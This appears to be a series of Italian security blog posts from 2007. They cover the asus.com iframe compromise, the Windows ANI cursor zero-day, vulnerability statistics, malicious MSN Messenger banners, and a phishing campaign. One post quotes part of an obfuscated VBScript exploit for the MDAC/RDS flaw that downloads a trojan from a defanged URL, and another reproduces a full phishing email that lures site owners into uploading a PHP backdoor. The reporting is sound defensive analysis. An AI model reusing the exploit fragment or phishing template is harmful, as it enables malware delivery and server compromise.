Ieri, tramite il suo blog, Kaspersky ha segnalato la compromissione del sito asus.com. Stando a quanto detto da loro, il codice all’interno della pagina richiamata tramite un iframe inserito nella home page di asus.com sfrutterebbe il recente bug sui file ANI di Microsoft Windows.
L’ISC ha fatto notare che Asus utilizza un round robin DNS per i Webserver. Quello che nessuno ha detto è che l’unico server ad essere stato compromesso è stato 211.72.249.198, l’unico che raggiunto con www.asus.com presenta la pagina internazionale di Asus.

Tutti gli altri server presentano la home page standard di Asus USA.
Come già detto, i cracker hanno utilizzato un iframe per includere codice JavaScript e VBScript malevolo, ma contrariamente a quanto detto da Kaspersky, esso non sfrutta il bug sui file ANI ma una vulnerabilità in Microsoft Data Access Components corretta con la patch MS06-014.
Ecco come si presenta la parte compromessa della pagina di www.asus.com (click per ingrandire):

La pagina iniettata, ospitata su un Webserver cinese (indirizzo ip 222.73.247.123), contiene del codice JavaScript offuscato, il quale una volta decodificato crea un VBScript appositamente scritto per sfruttare la vulnerabilità su RDS, ne riporto la parte più significativa (ho volutamente modificato http nell’url):
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "hxxp://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
L’immagine PNG richiamata è in realtà un Trojan eseguibile su piattaforme Windows (offuscato) (32bit x86) della famiglia PSW i quali fungono da keylogger e “steal password”.

La cosa grave, a mio avviso, è che a due giorni dalla segnalazione Asus non ha ancora fatto niente per evitare l’infezione dei propri visitatori.

Microsoft sta affrontando quella che definirei una delle più serie vulnerabilità zero-day di Windows.
L’exploit zero-day segnlato il 28 Marzo dal laboratorio di McAfee riguarda un buffer overflow nel gestore dei cursori animati di Windows (user32.dll), esso infatti non controllando l’header dei file “.ani” (animated) causa un bufferoverflow che pu essere usato per compromettere un sistema Windows.
La paternità sulla scoperta del bug spetta a Determina, la quale già dallo scorso 20 Dicembre sta collaborando attivamente con Microsoft per risolvere il problema. Secondo quanto detto nell’advisory ufficiale la patch rilasciata due anni fa da Microsoft, dopo la segnalazione del bug da eEye, il problema dei buffer overflow nell’header dei cursori animati non era stato completamente risolto.

La pericolosità di questo bug sta nel fatto che un file, di icone animate, creato ad arte può essere inserito in qualsiasi pagina Web o e-mail. Addirittura aprendo una cartella con un file “ani” creato ad arte, a causa del servizio anteprima di Windows, senza bisogno di aprire il file sarà possibile far crashare il processo “explorer”.

Tramite il bollettino di Microsoft si apprende che i vettori di attacco sono Internet Explorer, Outlook Express, Outlook e Windows Mail. Microsoft stessa consiglia di leggere le e-mail in modalità testo semplice (plain text) in Outlook 2002 e successivi e Windows Mail. Attenzione perchè con Windows Mail se si inoltra o si risponde ad una e-mail arrivata, anche se è attiva la modalità testo semplice, il problema non si risolve. Da notare inoltre che per qualsiasi versione di Outlook Express attualmente non esistono workaround.

Per ora Firefox sembra non essere interessato dal problema, anche se in teoria potrebbe esserlo in quanto gestisce i cursori animati tramite le API di Windows.

Benchè il bug sia molto recente sono moltissimi gli exploit pubblici e le varianti utilizzate da gruppi senza scrupolo. Come successo circa un mese fa, alcuni siti compromessi, sono utilizzati per veicolare versioni malevole di exploit sfruttanti la vulnerabilità sui cursori animati. L’ISC ha fornito una lista aggiornata dei domini utilizzati e una regola per Snort, che blocca i file “ani”, sicuramente più efficace del blocco a livello DNS.

Microsoft ha fatto sapere che rilascerà la patch ufficiale domani, 3 Aprile, vista la gravità del problema. La software house di Redmond ci tiene a sottolineare che la path al problema era già stata prevista, grazie alla collaborazione con Determina, per il 10 Aprile.

Esistono due patch non ufficiali per risolvere il bug in questione: una rilasciata da eEye e l’altra da ZIRT. Attenzione però al falso senso di sicurezza, esiste un exploit pubblico che riesce a bypassare i controlli messi in pratica dalla patch di eEye.

In definitiva tutti i sistemi Microsoft Windows basati su NT sono vulnerabili: Windows 2000, Windows XP, Windows 2003 e Windows Vista.

Update: come annunciato Microsoft ha pubblicato la patch. Consiglio di installarla il prima possibile.

La notizia proviene dall’undicesimo Symantec Internet Security Threat Report. L’analisi rilasciata da Symantec prende in esame le vulnerabilità (inclusi quelli dei sistemi operativi) degli ultimi sei mesi del 2006.
Durante questo periodo 39 vulnerabilità, 12 delle quali gravi, sono state scoperte in Microsoft Windows. Il tempo medio impiegato per il rilascio di patch, da parte di Microsoft, è di 21 giorni. Nel primo semestre 2006 le vulnerabilità segnalate sono state 22 con 13 giorni medi per il rilascio delle patch.
Al secondo posto della classifica si trova Red Hat Linux con 208 vulnerabilità, di cui 2 gravi e 58 giorni di media per il rilascio dei fix. Nella prima metà del 2006 il numero dei bug segnalati in RHL sono stati 42 con 13 giorni medi per il fix.
La classifica continua con Mac OS X e HP-UX.

Sono sicuro che gli investimenti di Microsoft, fatti negli utlimi anni, abbiano contribuito a rendere più sicuri prodotti come Windows XP (SP2) e Windows Vista.
Da una ricerca fatta da Jeff Jones, rilasciata il giorno dopo quella di Symantec, Vista si è dimostrato più sicuro nei 90 giorni successivi al lancio sul mercato rispetto a XP.
Anche in questo documento viene messo a confronto Windows con sistemi come Red Hat Linux (Workstation 4), Ububtu (6.06 TLS), SUSE (Desktop 10) e altri.
Le ricerche di Symantec e di Jones non riportano la lista delle vulnerabilità prese in esame per le loro statistiche, così ho deciso di percorrere a ritroso la lista su Secunia, per Ubuntu le parti interessate sono: mono, gdm, kernel, ruby, gpg, ecc…
Nella lista di Windows XP Pro si trovano (sempre in ordine cronologico inverso): CSRSS (kernel), NetrWkstaUserEnum (kernel), CSRSS (kernel), Outlook Expres, CSRSS (kernel), ecc…

Non ci vuole molte a capire che il tipo di vulnerabilità dei due sistemi operativi sono completamente differenti; nella prima lista sono presenti maggiormente funzionalità non facenti parte del Kernel essendo applicazioni di terze parti, la seconda lista invece riporta problemi relativi al kernel di Windows.
Com’è possibile mettere a confronto un sistema operativo, come Ubuntu, che fornisce nativamente circa 10.000 pacchetti con uno come Windows che ne fornisce si e no 20?

In questa gara non ci sono vincitori, ma solo vinti.

Sembra che il sistema dei banner pubblicitari di Microsoft sia stato compromesso e che sia stato sfruttato per inviare, agli utilizzatori di Live Messenger (Msn Messenger), dei banner che inducono ad installare spyware.

Il banner incriminato appare per pubblicizzare un link al download di un programma chiamato “PC-Secure”. Tutti i banner e le message box visualizzate inducono l’utente ad installare software malware e spyware.
La finestra, visibile dopo il click sul banner, chiede se si vuole proseguire al download di “PC-Secure” oppure no. Essendo studiato per scopi malevoli anche la pressione di “Cancel” farà avviare un ActiveX ad hoc. Al momento non c’è soluzione al problema, se dovesse apparire il messaggio l’unica soluzione è chiudere le finestre tramite la classica “X”.

I banner in questione non dovrebbero essere visualizzati agli utenti italiani, ma è consigliabile comunque prestare attenzione.

“Pc-Secure” è una variante di WinFixer e ErrorSafe, malware e spyware già conosciuti. Per maggiori informazioni su di essi leggere il bollettino redatto da Symantec. Anche se si tratta di software risalente al 2005 ed ogni anti-virus è in grado di rilevarlo si trovano guide dettagliate per la rimozione manuale.
Per ulteriori dettagli leggere l’articolo originale su Spyware Sucks.

Alcuni blog di sicurezza negli ultimi giorni stanno ponendo l’attenzione su una e-mail, che tramite phishing, si propone come un controllo dell’ISP che ospitata il proprio dominio.

Gli attacker prendendo le e-mail di contatto specificate nei WHOIS dei domini spediscono una richiesta, in inglese, che inivta ad caricare sul proprio spazio uno script in php (offuscato) che, secondo quanto scoperto dalle prime indagini, raccoglie informazioni sul sistema, apre una shell e installa un bot IRC scritto in Perl.

Solitamente il mittente, falsificato, è il proprio ISP, ma sono state rilevate anche varianti con mittente lo US FDIC (Federal Deposit Insurance Corporation).

I file php allegati che sono stati rilevati fin ora sono:

• webguard.php, size 130990 bytes, MD5: 1071956063131f0fd178ace92ab526bb e SHA1: c47dd28e336030e3d940b66e2884aba91124a831
• vprotect.php, size: 156686 bytes, MD5: 43f3c330f6e85943fd4a60c3b89787e2 e SHA1: d58bcb698417cbcf005a0e26e9e962a5097892d9

Quello che segue è una delle varianti della mail:

Dear #Nome dell’ISP# valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file “guard.php” in: “./public_html”

or (for Windows Based servers which use ASP) upload the file “guard.asp” in: “./wwwroot” in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named “guard.zip”
2) Extract file “guard.php”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “Public_html” or “htdocs”
6) Choose “Upload Files”
7) Upload the file “guard.php”
Check its URL too “http://www.yoursite.com/guard.php”, if it is ok

For Windows based websites that use ASP:
1) Download the attachment named “guard.zip”
2) Extract file “guard.asp”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “wwwroot” directory
6) Choose “Upload Files”
7) Upload the file “guard.asp”
Check its URL too “http://www.yoursite.com/guard.asp”, if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards

#Nome dell’ISP#

L’attacco è stato rilevato per la prima volta l’8 Febbraio 2007 (Solid Space – Bluehost) mentre i principali blog ne stanno parlando solo negli utlimi giorni.